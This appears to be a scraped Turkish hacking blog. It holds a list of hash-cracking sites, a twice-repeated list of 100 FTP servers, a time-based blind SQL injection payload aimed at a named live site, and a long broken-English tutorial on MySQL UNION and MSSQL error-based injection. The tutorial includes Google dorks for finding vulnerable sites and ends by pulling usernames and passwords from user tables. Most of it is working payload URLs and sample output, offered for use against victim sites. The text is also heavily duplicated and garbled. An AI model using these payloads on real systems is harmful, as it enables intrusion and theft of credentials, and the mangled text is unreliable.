Tavsiye ettiğim 14 site:)
http://gdataonline.com
http://md5.rednoize.com
http://ice.breaker.free.fr
http://www.milw0rm.com/md5/
http://shm.hard-core.pl/md5/
http://www.hashchecker.com
http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack/
http://md5.benramsey.com
http://md5.altervista.org
http://shm.hard-core.pl
http://plain-text.info
http://www.passcracking.ru/
http://www.securitystats.com/tools/hashcrack.php
http://www.xmd5.org/index_en.htm
16 Temmuz 2010 Cuma
FTPS
100 Tane Taş Gibi FTP Alın Tepe Tepe Kullanın:B
1. ftp.dna.affrc.go.jp - 1564.86 Gb
2. ooopackages.good-day.net - 707.91 Gb
3. ftp.cz.debian.org - 691.50 Gb
4. ftp.ntua.gr - 646.58 Gb
5. ftp.fu-berlin.de - 615.01 Gb
6. ftp.dvo.ru - 573.33 Gb
7. ftp.piotrkosoft.net - 513.74 Gb
8. ftp.skynet.be - 410.65 Gb
9. ftp.nsysu.edu.tw - 407.96 Gb
10. ftp.ni.com - 395.73 Gb
11. ftp.es.pureftpd.org - 390.94 Gb
12. ftp.cs.tu-berlin.de - 348.86 Gb
13. ftp.vector.co.jp - 324.53 Gb
14. ftp.usa.openbsd.org - 303.42 Gb
15. ftp.tiscali.nl - 300.58 Gb
16. core.ring.gr.jp - 278.93 Gb
17. ftp.ubi.com - 234.22 Gb
18. ftp.promt.ru - 178.13 Gb
19. ftp.e-promt.com - 178.13 Gb
20. ftp.de.debian.org - 176.30 Gb
21. ftp.gdc.ru - 143.25 Gb
22. ftp.nuug.no - 141.78 Gb
23. ftp.carnet.hr - 133.54 Gb
24. ftp.relline.ru - 102.56 Gb
25. ftp.rub.de - 101.86 Gb
26. ftp.lip6.fr - 97.11 Gb
27. ftp.suse.com - 94.51 Gb
28. ftp.tau.ac.il - 89.08 Gb
29. ftp.krokus.ru - 84.04 Gb
30. ftp.ru - 77.81 Gb
31. ftp.demos.ru - 77.81 Gb
32. ftp.uni-heidelberg.de - 77.74 Gb
33. ftp.registro.br - 77.27 Gb
34. ftp.fasta.fh-dortmund.de - 77.09 Gb
35. ftp.rusnet.ru - 71.27 Gb
36. ftp.neva.ru - 71.27 Gb
37. ftp.cb.spb.ru - 71.27 Gb
38. ftp.kfki.hu - 70.85 Gb
39. ftp.eu.uu.net - 68.43 Gb
40. ftp.de.uu.net - 68.43 Gb
41. ftp.archive.de.uu.net - 68.43 Gb
42. files.3dnews.ru - 67.21 Gb
43. ftp.iastate.edu - 60.05 Gb
44. ftp.scenesp.org - 57.51 Gb
45. ftp.sai.msu.su - 57.28 Gb
46. ftp.skbkontur.ru - 53.99 Gb
47. ftp.shef.ac.uk - 53.26 Gb
48. ftpg.corbina.ru - 52.87 Gb
49. ftpg.corbina.net - 52.87 Gb
50. ftp.rovercomputers.ru - 51.35 Gb
51. ftp.roverbook.ru - 51.35 Gb
52. ftp.roverbook.com - 51.35 Gb
53. ftp.eq.uc.pt - 51.25 Gb
54. ftp.ee.debian.org - 49.07 Gb
55. ftp.spnet.net - 45.97 Gb
56. ftp.groza.ru - 41.91 Gb
57. ftp.ctm.ru - 40.37 Gb
58. tug.org - 39.13 Gb
59. ftp.atcomp.cz - 38.29 Gb
60. ftp.tomsknet.ru - 35.77 Gb
61. ftp.programbank.ru - 35.00 Gb
62. ftp.prbank.ru - 35.00 Gb
63. ftp.aopen.ru - 34.95 Gb
64. ftp.piton-asc.ru - 33.07 Gb
65. ftp.galaktika.ru - 32.34 Gb
66. ftp.kd85.com - 31.79 Gb
67. ftp1.cs.wisc.edu - 31.10 Gb
68. ftp.cs.princeton.edu - 30.25 Gb
69. ftp2.fr.pureftpd.org - 28.02 Gb
70. ftp.ocs.ru - 27.48 Gb
71. ftp.cs.rpi.edu - 27.43 Gb
72. ftp.nstu.ru - 27.24 Gb
73. niihau.student.utwente.nl - 26.96 Gb
74. borft.student.utwente.nl - 26.96 Gb
75. ftp.sara.nl - 26.78 Gb
76. happy.kiev.ua - 26.17 Gb
77. ftp.unicon.ru - 24.80 Gb
78. ftp.ea.com.akadns.net - 23.91 Gb
79. ftp.ea.com - 23.91 Gb
80. ftp2.promt.ru - 23.79 Gb
81. ftp.de.flightgear.org - 23.56 Gb
82. ftp.prosoft.ru - 22.61 Gb
83. ftp.tnt.uni-hannover.de - 22.05 Gb
84. ftp.sovintel.ru - 21.29 Gb
85. ftp.foracom.ru - 20.57 Gb
86. ftp.otrb.ru - 18.93 Gb
87. ftp.espci.fr - 18.55 Gb
88. ftp.liniagrafic.ru - 18.55 Gb
89. ftp.rsu.ru - 18.09 Gb
90. topex.ucsd.edu - 17.73 Gb
91. ftp.dlink.pl - 17.68 Gb
92. ftp.avtlg.ru - 17.49 Gb
93. ftp.take2.de - 17.32 Gb
94. ftp.ripe.net - 17.29 Gb
95. sunsite.dk - 16.82 Gb
96. sunsite.auc.dk - 16.82 Gb
97. lemm.ru - 16.56 Gb
98. ftp.lemm.ru - 16.56 Gb
99. ftp.netscape.com.edgesuit e.net - 16.30 Gb
100. ftp.netscape.com - 16.30 Gb
1. ftp.dna.affrc.go.jp - 1564.86 Gb
2. ooopackages.good-day.net - 707.91 Gb
3. ftp.cz.debian.org - 691.50 Gb
4. ftp.ntua.gr - 646.58 Gb
5. ftp.fu-berlin.de - 615.01 Gb
6. ftp.dvo.ru - 573.33 Gb
7. ftp.piotrkosoft.net - 513.74 Gb
8. ftp.skynet.be - 410.65 Gb
9. ftp.nsysu.edu.tw - 407.96 Gb
10. ftp.ni.com - 395.73 Gb
11. ftp.es.pureftpd.org - 390.94 Gb
12. ftp.cs.tu-berlin.de - 348.86 Gb
13. ftp.vector.co.jp - 324.53 Gb
14. ftp.usa.openbsd.org - 303.42 Gb
15. ftp.tiscali.nl - 300.58 Gb
16. core.ring.gr.jp - 278.93 Gb
17. ftp.ubi.com - 234.22 Gb
18. ftp.promt.ru - 178.13 Gb
19. ftp.e-promt.com - 178.13 Gb
20. ftp.de.debian.org - 176.30 Gb
21. ftp.gdc.ru - 143.25 Gb
22. ftp.nuug.no - 141.78 Gb
23. ftp.carnet.hr - 133.54 Gb
24. ftp.relline.ru - 102.56 Gb
25. ftp.rub.de - 101.86 Gb
26. ftp.lip6.fr - 97.11 Gb
27. ftp.suse.com - 94.51 Gb
28. ftp.tau.ac.il - 89.08 Gb
29. ftp.krokus.ru - 84.04 Gb
30. ftp.ru - 77.81 Gb
31. ftp.demos.ru - 77.81 Gb
32. ftp.uni-heidelberg.de - 77.74 Gb
33. ftp.registro.br - 77.27 Gb
34. ftp.fasta.fh-dortmund.de - 77.09 Gb
35. ftp.rusnet.ru - 71.27 Gb
36. ftp.neva.ru - 71.27 Gb
37. ftp.cb.spb.ru - 71.27 Gb
38. ftp.kfki.hu - 70.85 Gb
39. ftp.eu.uu.net - 68.43 Gb
40. ftp.de.uu.net - 68.43 Gb
41. ftp.archive.de.uu.net - 68.43 Gb
42. files.3dnews.ru - 67.21 Gb
43. ftp.iastate.edu - 60.05 Gb
44. ftp.scenesp.org - 57.51 Gb
45. ftp.sai.msu.su - 57.28 Gb
46. ftp.skbkontur.ru - 53.99 Gb
47. ftp.shef.ac.uk - 53.26 Gb
48. ftpg.corbina.ru - 52.87 Gb
49. ftpg.corbina.net - 52.87 Gb
50. ftp.rovercomputers.ru - 51.35 Gb
51. ftp.roverbook.ru - 51.35 Gb
52. ftp.roverbook.com - 51.35 Gb
53. ftp.eq.uc.pt - 51.25 Gb
54. ftp.ee.debian.org - 49.07 Gb
55. ftp.spnet.net - 45.97 Gb
56. ftp.groza.ru - 41.91 Gb
57. ftp.ctm.ru - 40.37 Gb
58. tug.org - 39.13 Gb
59. ftp.atcomp.cz - 38.29 Gb
60. ftp.tomsknet.ru - 35.77 Gb
61. ftp.programbank.ru - 35.00 Gb
62. ftp.prbank.ru - 35.00 Gb
63. ftp.aopen.ru - 34.95 Gb
64. ftp.piton-asc.ru - 33.07 Gb
65. ftp.galaktika.ru - 32.34 Gb
66. ftp.kd85.com - 31.79 Gb
67. ftp1.cs.wisc.edu - 31.10 Gb
68. ftp.cs.princeton.edu - 30.25 Gb
69. ftp2.fr.pureftpd.org - 28.02 Gb
70. ftp.ocs.ru - 27.48 Gb
71. ftp.cs.rpi.edu - 27.43 Gb
72. ftp.nstu.ru - 27.24 Gb
73. niihau.student.utwente.nl - 26.96 Gb
74. borft.student.utwente.nl - 26.96 Gb
75. ftp.sara.nl - 26.78 Gb
76. happy.kiev.ua - 26.17 Gb
77. ftp.unicon.ru - 24.80 Gb
78. ftp.ea.com.akadns.net - 23.91 Gb
79. ftp.ea.com - 23.91 Gb
80. ftp2.promt.ru - 23.79 Gb
81. ftp.de.flightgear.org - 23.56 Gb
82. ftp.prosoft.ru - 22.61 Gb
83. ftp.tnt.uni-hannover.de - 22.05 Gb
84. ftp.sovintel.ru - 21.29 Gb
85. ftp.foracom.ru - 20.57 Gb
86. ftp.otrb.ru - 18.93 Gb
87. ftp.espci.fr - 18.55 Gb
88. ftp.liniagrafic.ru - 18.55 Gb
89. ftp.rsu.ru - 18.09 Gb
90. topex.ucsd.edu - 17.73 Gb
91. ftp.dlink.pl - 17.68 Gb
92. ftp.avtlg.ru - 17.49 Gb
93. ftp.take2.de - 17.32 Gb
94. ftp.ripe.net - 17.29 Gb
95. sunsite.dk - 16.82 Gb
96. sunsite.auc.dk - 16.82 Gb
97. lemm.ru - 16.56 Gb
98. ftp.lemm.ru - 16.56 Gb
99. ftp.netscape.com.edgesuit e.net - 16.30 Gb
100. ftp.netscape.com - 16.30 Gb
Zaman Tabanlı Full-Blind SQL Injection
Null Blind SQL Injection (çıktıda hiç değişiklik oluşturmayan SQL Injectionlar) popüler konularımızdan biri. Her ne kadar MySQL, ORACLE, SQL Server, PostgreSQL de rahatça takılabilsekte MS Access gibi acayip ve genelde tırt veritabanlarına gelince takılıyoruz.
Çünkü genelde çoğu veritabanı, SLEEP ya da WAITFOR DELAY gibi fonksiyonlar ile zaman tabanlı ataklar yapmamızı sağlarken MS Access gibi veritabanlarında bu imkanımız yok.
Diğer bir örnek ise MySQL ve BENCHMARK. MySQL zaman tabanlı SQL Injection atakları yapmak için BENCHMARK' ı kullanabiliyoruz ve basitçe veritabanında uzun süren herhangi bir iş yapıyor ve çıktının kaç saniyede üretildiğine bakıp açığı exploit edebiliyoruz.
Chema Alonso BENCHMARK yerine çok uzun sürecek SQL queryleri çalıştırarak her veritabanında çalışabilecek bir zaman tabanlı SQL Injection yöntemi geliştirmiş.
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
BENCHMARK ya da bu yöntem şiddetle kaçınılmalı ve SQL Injectionlarda en son yöntem olarak başvurulmalı. Nedeni basit, serverın CPU' sunu aşırı derecede harcamış olacaksınız. Dolayısıyla server cevap vermeyebilir ya da ilginç hatalar almaya başlabilirsiniz.
Çünkü genelde çoğu veritabanı, SLEEP ya da WAITFOR DELAY gibi fonksiyonlar ile zaman tabanlı ataklar yapmamızı sağlarken MS Access gibi veritabanlarında bu imkanımız yok.
Diğer bir örnek ise MySQL ve BENCHMARK. MySQL zaman tabanlı SQL Injection atakları yapmak için BENCHMARK' ı kullanabiliyoruz ve basitçe veritabanında uzun süren herhangi bir iş yapıyor ve çıktının kaç saniyede üretildiğine bakıp açığı exploit edebiliyoruz.
Chema Alonso BENCHMARK yerine çok uzun sürecek SQL queryleri çalıştırarak her veritabanında çalışabilecek bir zaman tabanlı SQL Injection yöntemi geliştirmiş.
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
BENCHMARK ya da bu yöntem şiddetle kaçınılmalı ve SQL Injectionlarda en son yöntem olarak başvurulmalı. Nedeni basit, serverın CPU' sunu aşırı derecede harcamış olacaksınız. Dolayısıyla server cevap vermeyebilir ya da ilginç hatalar almaya başlabilirsiniz.
Asp sitelerde Sql İnjection
Asp sitelerde Sql injection Uygulaması deneme yanılmadır...
bunun hakkında bi video çekem dedim
hayırlı seyirler :D Yorumları eksik etmeyin ''!!!
Video Link
http://www.2shared.com/file/9099768/93a66e3e/HeRoTuRK.html
RAR password :HeRoTuRK
bunun hakkında bi video çekem dedim
hayırlı seyirler :D Yorumları eksik etmeyin ''!!!
Video Link
http://www.2shared.com/file/9099768/93a66e3e/HeRoTuRK.html
RAR password :HeRoTuRK
Mysql İnjection Rfi Oluşturma
System hackerin çekmiş olduğu video Hayırlı Seyirler (:
http://www.multiupload.com/SG6BMD9SVI
http://www.multiupload.com/SG6BMD9SVI
SQL injection tutorial
Yüzeysel Olarak Buradan Bakalım Gittikçe Detaya İneceğiz
1. SQL-Tutorial-injetion
######################
1.1 What is SQL-injetion?
1.2 Try this page for vulnerability!
1.3 How to discover what numbers of kolumnave exist?
1.4 Try to select the function UNION!
1.5 How to discover the version of MySQL?
1.6 How to discover Table_name?
1.7 How to discover Column_name?
1.8 Conclusion?
============================
1.1 What is SQL-injetion?
============================
-SQL-injetion is therefore one of the methods used most days sodit to get access to any website.
This method gives permission to the attacker's attacks via a URL.
With this method the attacker has access to information different from MySQL's (username, passwords), different logins, access the page management, etc ... CC
====================================
1.2 Try this page for vulnerability!
====================================
We say that something such:
------------------------------------
http://www.site.com/vesti.php?id=1
------------------------------------
Now that the page is testojm that vulnerability, or simply have a go and it buggs add ( ') so presjen up, which will appear thus:
------------------------------------
http://www.site.com/vesti.php?id=1 '
------------------------------------
So after this action, if we give any error as such.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++
"You have an error in your SQL syntax;" or "Warning: mysql_result () [function.mysql-Result]"
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++
By this means the page is vulnerability, so has concessions!
================================================== ===
1.3 How to discover what numbers of kolumnave exist?
================================================== ===
To find out how we use it Kolumna: Order by
So "order by" without a comma will helps us to find how many pages we have kolumna victim, go with the example:
-------------------------------------------------- -------------------------------------------------- --
http://www.site.com/vesti.php?id=1 order by 1 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --
http://www.site.com/vesti.php?id=1 order by 2 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --
http://www.site.com/vesti.php?id=1 order by 3 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --
http://www.site.com/vesti.php?id=1 order by 4 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --
http://www.site.com/vesti.php?id=1 Order by 5 - <-> Error page - So here we have error!
-------------------------------------------------- -------------------------------------------------- --
-With this mean that we have to this page 4 Kolumna, so the last marim number which does not error!
=======================================
1.4 Try to select the function UNION!
=======================================
So now will prove to nxjerim numbers kolumnave and other data in the window, through the "union select".
If you have 4 numbers in the kolumnave example would looked something like this:
-------------------------------------------------- -------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4 --
-------------------------------------------------- -------------
If the window shown us any of the numbers from 1-4 is good and works quite OK, but if not then try to add the nji - (minus) before the "1 (nj?shi)" So first, the numbers can change may be 50,71,9999 etc example:
-------------------------------------------------- -----------------
http://www.site.com/vesti.php?id=-50 union select 1,2,3,4 --
-------------------------------------------------- -----------------
http://www.site.com/vesti.php?id=-71 union select 1,2,3,4 --
-------------------------------------------------- -----------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,3,4 --
-------------------------------------------------- -----------------
Must now show any of 4 numbers from 1-4.
If any of these numbers appear, then everything is OK!
=========================================
1.5 How to discover the version of MySQL?
=========================================
How to discover the version of MySQL is easy, this can make replacing the kolumnes this "@ @ version."
Then we should show what version is present in the victim page.
Say that the number which appears in the window is 3-rain, to show the clear will tell you the example below.
-------------------------------------------------- ------------------------
http://www.site.com/vesti.php?id=-9999 union select 1.2, @ @ version .4 --
-------------------------------------------------- ------------------------
And now with us will be displayed in the windows version.
It should be noted that the version 5.xx, we can get tables & kolumnat using function "INFORMATION_SCHEMA" while the older versions with this possibility does not exist or function.
=============================
1.6 How to discover Table_name?
=============================
As I mentioned above and that there is a small problem to older versions of MySQL's (4.xx 3.xx, etc.).
For this reason you will have once acted as if the version of MySQL, it is then for the 4.xx versions 5.xx
VERSION 4.x.x
To find older versions on table_name (4.xx, 3.xx) skemi any way out except to try and tables by rote, using a little logic.
For these versions is preferable to get a list of the major tables and try.
As the tables used are: users, user, admin, Admins, member, members, login, Administrators, mysql.user etc. ..
VERSION 5.x.x
Now note that if the page has 5.xx version is easier because now we can decide we use the function "INFORMATION_SCHEMA.TABLES" to detect and Tables "INFORMATION_SCHEMA.COLUMNS" kolumnat.
To find tables going to the example as follows:
-------------------------------------------------- -------------------------------------------------- ------
http://www.site.com/vesti.php?id=-9999 union select 1.2, table_name, 4 + from + information_schema.tables---
-------------------------------------------------- -------------------------------------------------- ------
Then replace the table_name the number that appears in our window, and then we must shafqen table.
===============================
1.7 How to discover Column_name?
===============================
The same applies to finding kolumnave (column_name) as the table_name!
VERSION 4.x.x
As with kolumna used are: username, user, user_name, usr, usn, pass, password, passwd, pwd, email, etc ... emailadress
VERSION 5.x.x
To reveal the names of kolumnave and as I said before is the same as off the table that only in this case, we must place writes tables set column / s.
Go to the display with this example:
-------------------------------------------------- -------------------------------------------------- -------
http://www.site.com/vesti.php?id=-82 union select 1.2, column_name, 4 + from + information_schema.columns---
-------------------------------------------------- -------------------------------------------------- -------
Now to choose only one table and to detect only the names of its kolumnave go as example:
-------------------------------------------------- -------------------------------------------------- ------------------------------
http://www.site.com/vesti.php?id=-82 union select 1.2, column_name, information_schema.columns + 4 + from + where + table_name = Users --
-------------------------------------------------- -------------------------------------------------- ------------------------------
So in this case would appear only for column_name Table "Users".
Now for the end to say that is table_name (users) and are column_name (username, password, email).
So we must act to appear on the data from MySQL:
-------------------------------------------------- -------------------------------------------------- -------------------------
http://www.site.com/vesti.php?id=-71 union select 1.2, concat (username, chart (58), password, chart (58), email), 4 from users --
-------------------------------------------------- -------------------------------------------------- -------------------------
Concat () = used to bashkur 2.3 .. kolumna or more in one place.
Chart (58) = Jane colon (:) that makes the separation between column_name (of)!
================
1.8 Conclusion?
================
And as a result of the post will be all Links in a country that have to be based with easy!
================================================== ================================================== ==========================
http://www.site.com/vesti.php?id=1
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 '
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 order by 1 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 order by 2 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 order by 3 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 order by 4 - <-> opens the site gives us not so normal Error
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 Order by 5 - <-> Error page - So here we have error!
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4 --
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=-9999 union select 1,2,3,4 --
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=-9999 union select 1.2, @ @ version .4 --
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=-9999 union select 1.2, table_name, 4 + from + information_schema.tables---
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=-82 union select 1.2, column_name, 4 + from + information_schema.columns---
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=-82 union select 1.2, column_name, information_schema.columns + 4 + from + where + table_name = Users --
-------------------------------------------------- -------------------------------------------------- --------------------------
http://www.site.com/vesti.php?id=-71 union select 1.2, concat (username, chart (58), password, chart (58), email), 4 from users --
================================================== ================================================== ==========================
____________________________________________________________________________________________________________________________________
################################################## ################################################## ################################
2. MSSQL - injection, method of attack!
######################################
2.1 Introduction
2.2 How to seek site vulnerability?
2.3 How to prove that a site is vulnerability?
2.4 How to discover version / name of the DB's?
2.5 How to discover the names of the tables (table_name)?
2.6 How to discover names of kolumnave (column_name)?
2.7 How to retrieve data from tables that interest us (eg, username, pass, email etc)?
2.8 Conclusion?
[INTRODUCTION 2.1]
###############
P?rsh?detje!
In this lesson, will you try to explain a technique to other already known, MSSQL-injection.
So you will have the opportunity to learn how this method is used, acting as the PET to obtain information (username, password, or logins) or various other info through this technique.
MSSQL-injection, can be used for products which are created by a company known Microsoft.
This type of injection, then deal with those pages which are coded in SSI / ASPX etc..
There are several types of attacks on this method as:
* - Normal MSSQL SQL Injection Attack
* - MSSQL Injection in Web Services (SOAP Injection)
* - MSSQL Injection Attack with UNION
* - ODBC Error Message Attack with "convert"
* - MSSQL Blind SQL Injection Attack, etc. ..
For this writing will use this type of attack:
"ODBC Error Message Attack with" convert "
[2.2 As demand vulnerability page? ]
############################################
How to look for pages that are vulnerability, is easy. This can make using the services of the Company GOOGLE gigante.
Go open: www.google.com
And write eg: inurl: ". Asp" id "
inurl: "news.asp" menu "
inurl: "content.asp" "sub"
inurl: "games.asp" id "
ETC ....( I decided a few examples, you now use the logic, for dorks best)
[2.3 How to prove that a site is vulnerability? ]
################################################## ######
This can be easily understood after adding id's of pages a high comma ( ').
And if we give our reply by displaying any error meant that the site is such vulnerability:
++++++++++++++++++++++++++++++++++++++
/ ODBC Microsoft Access Driver /
++++++++++++++++++++++++++++++++++++++
/ Unclosed quotation mark /
++++++++++++++++++++++++++++++++++++++
/ Microsoft Ole DB Provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++
These are some of the most frequent responses that appear on the page that are vulnerability to MSSQL - injection.
Now as an example the act must, therefore, must decide where presjen high ( ').
For example:
--------------------------------------
www.localhost.com/lajmi.asp?id=100 '
--------------------------------------
Now we say that an error is displayed:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e14 '
Unclosed quotation mark after the character string ') AND (Volgorde> 0) Order by Volgorde'.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So the page is vulnerability?
[2.4 How to discover version / name of the DB's? ]
#################################################
Go with the example easier to understand:
Version:
-------------------------------------------------- ------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (@ @ version)) --
-------------------------------------------------- ------------------
And we will appear for example:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Mar 29 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 (Build 6002: Service Pack 2) (VM) 'to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Now go to discover Db_Name:
-------------------------------------------------- -------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (db_name ()))--
-------------------------------------------------- -------------------
eg.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'KHG_CREW_DB' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
[2.5 How to discover the names of the tables (table_name)]
################################################## # # # #
For discovered or simply to find the plates of any page go through this method.
For example:
-------------------------------------------------- -------------------------------------------------- --------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables)) --
-------------------------------------------------- -------------------------------------------------- --------------
And now an error will be displayed such as:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'Users' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So in this case the table (table_name) is the first 'Users', now go to find the next table:
For example:
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ( 'Users')))--
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
And will now appear an error of njejt and will give the second table:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'news' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Tables in this case is' news'
Now to find the Table (table_name) third go so:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ( 'Users',' news')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
And we will show the third table:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'categories' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
The third table is therefore 'categories', and continue so on until you discover all the tables.
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- -----------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 table_name from information_schema.tables where table_name not in ( 'Users',' news', 'categories'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- -----------------------
[2.6 How to discover names of kolumnave (column_name)]
################################################## ######
-If you want to nxjerim column_name of table 'Users' go:
For example:
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users'))--
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'Username' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So the name of kolumn?s first table (table_name) 'Users' is' username'
Now go find kolumn?n (column_name) for the second the same table 'Users':
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users' and column_name not in (' username')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'password' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Name kolumnes (column_name) the second is' password ', now go find the next column_name:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 column_name from information_schema.columns where table_name = 'Users' and column_name not in (' username ',' password ') )) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'emailaddress' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So is the third Colum_name 'emailaddress' and so forth continue until the end, so as to find you all kolumnat (column_name)!
[2.7 How to get us interested in the data (username, pass, email, etc.)]
################################################## ##########################
To do so we do not have anything that we noted from ndyshe ago.
In this part of the whole that must be done is to zeven?sojm? Table (table_name), and the names of kolumnave (column_name) in their countries that previously have found.
For this part we will use:
Table_name = Users
Column_name = username, password, emailaddress!
Now going to replace, for example:
-------------------------------------------------- -----------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 username from Users)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Ole DB Provider for SQL Server error'80040e07 '
Conversion failed when converting the nvarchar value 'admin' to data type int.
/ msn / shared / includes / main_rub.asp, line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
username: Admin
Kolumn?n now replace the first "username" with the second kolumn?n "password":
For example:
-------------------------------------------------- -----------------------------------------
www.localhost.com/lajmi.asp?id=100 + or +1 = convert (int, (select top 1 password from Users)) --
